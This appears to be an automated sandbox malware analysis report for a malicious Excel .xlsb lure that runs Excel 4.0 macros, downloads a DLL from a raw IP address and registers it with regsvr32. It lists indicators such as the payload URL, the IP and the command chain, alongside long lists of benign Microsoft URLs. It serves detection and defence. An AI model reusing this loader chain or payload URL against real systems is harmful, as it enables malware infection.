Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://tasks.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 14 Protected View This f
Source: Screenshot number: 4	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start " 18 the decryption of the doc

Found Excel 4.0 Macro with suspicious formulas

Source: Delivery_Information_7038598.xlsb	Initial sample: CALL
Source: Delivery_Information_7038598.xlsb	Initial sample: CALL
Source: Delivery_Information_7038598.xlsb	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll			Jump to dropped file

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal88.expl.evad.winXLSB@3/11@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{7BE2EDF5-A9C4-4DEF-9DC0-1522802C2D95} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image5.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Data Obfuscation:

Registers a DLL

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_03042ABC push dword ptr [edx+14h]; ret

2_2_03042BFD

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4600

Thread sleep time: -70000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Thread delayed: delay time: 70000

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.180.199.121	unknown	Netherlands		14576	HOSTING-SOLUTIONSUS	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.180.199.121/sat1_0609_2.dll	false	Avira URL Cloud: safe	unknown

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: sat1_0609_2[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.4:49747 -> 185.180.199.121:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.4:49747 -> 185.180.199.121:80

Networking:

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121

Source: global traffic

Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.office.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://augloop.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cdn.entity.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cortana.ai
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cr.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://directory.services.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://graph.windows.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
